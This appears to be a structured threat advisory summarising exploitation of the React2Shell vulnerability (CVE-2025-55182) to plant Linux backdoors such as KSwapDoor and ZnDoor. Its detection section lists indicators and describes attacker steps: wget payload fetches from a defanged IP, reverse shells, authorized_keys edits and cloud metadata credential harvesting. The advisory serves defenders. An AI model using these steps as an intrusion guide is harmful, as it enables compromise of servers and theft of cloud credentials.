Full Report
The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security. "KSwapDoor is a professionally engineered remote access tool designed with stealth in mind," Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, said in a
Analysis Summary
# Vulnerability: React2Shell Server-Side Vulnerability Leading to Remote Code Execution
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: 10.0 (Critical)
- CWE: Not explicitly mentioned, but related to Remote Code Execution/Improper Input Validation.
## Affected Systems
- Products: React/Next.js related component/functionality addressed by the vulnerability (Implied association with Next.js/React ecosystem, though the specific component is not named directly by CVE reference in the text). The text also references CVE-2025-66478 related to Next.js.
- Versions: Specific vulnerable versions are **not listed** in the provided text snippet.
- Configurations: Targeting systems running vulnerable implementations, often leading to Linux backdoor deployment.
## Vulnerability Description
The vulnerability, tracked as **React2Shell (CVE-2025-55182)**, allows threat actors to run arbitrary commands on affected systems. The flaw is actively exploited to deliver Linux backdoors such as KSwapDoor and ZnDoor, and deploy post-exploitation tools like reverse shells (Cobalt Strike) and RMM agents (MeshAgent). The attack chains often involve fetching payloads via `wget` using bash commands from remote servers.
## Exploitation
- Status: **Exploited in the wild**
- Complexity: Implied **Low to Medium**, as widespread exploitation by multiple APT groups (UNC-prefix groups) is reported, and simple `wget` bash commands are utilized for initial payload delivery.
- Attack Vector: **Network** (Remote Code Execution).
## Impact
- Confidentiality: **High** (Data theft, credential harvesting from IMDS endpoints).
- Integrity: **High** (Installation of persistent backdoors like KSwapDoor/ZnDoor, execution of arbitrary code).
- Availability: **High** (System compromise leading to potential denial of service or resource hijacking).
## Remediation
### Patches
- **No specific patch version numbers or vendor advisories** detailing the patched version are provided in this summary text. Users must consult vendor advisories related to CVE-2025-55182 and CVE-2025-66478 (Next.js).
### Workarounds
- No specific workarounds are provided in the text. General mitigation steps include blocking suspicious outbound connections and minimizing the attack surface until patches can be applied.
## Detection
- **Indicators of Compromise (IoCs):**
- Execution of bash commands fetching payloads using `wget` from remote servers (e.g., 45.76.155[.]14).
- Deployment of malware families: KSwapDoor, ZnDoor, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL (Noodle RAT).
- Post-exploitation activity involving setting up reverse shells to Cobalt Strike, dropping MeshAgent, and modifying `authorized_keys` files.
- Network connections to Cloudflare Tunnel endpoints ("\*.trycloudflare.com").
- Credential harvesting attempts targeting cloud IMDS endpoints (Azure, AWS, GCP).
- Use of secret discovery tools like TruffleHog and Gitleaks.
- **Detection Methods and Tools:** Endpoint Detection and Response (EDR) tools monitoring for unusual process execution (e.g., shell execution following web server processes), and network monitoring for beaconing to known C2 infrastructure or obscure tunneling domains.
## References
- Vendor advisories from Palo Alto Networks Unit 42 and Microsoft.
- Unit 42 Advisory: unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/ (Defanged for safety)
- Other Mentions: thehackernews . com/2025/12/react2shell-vulnerability-actively-exploited-to-deploy-linux-backdoors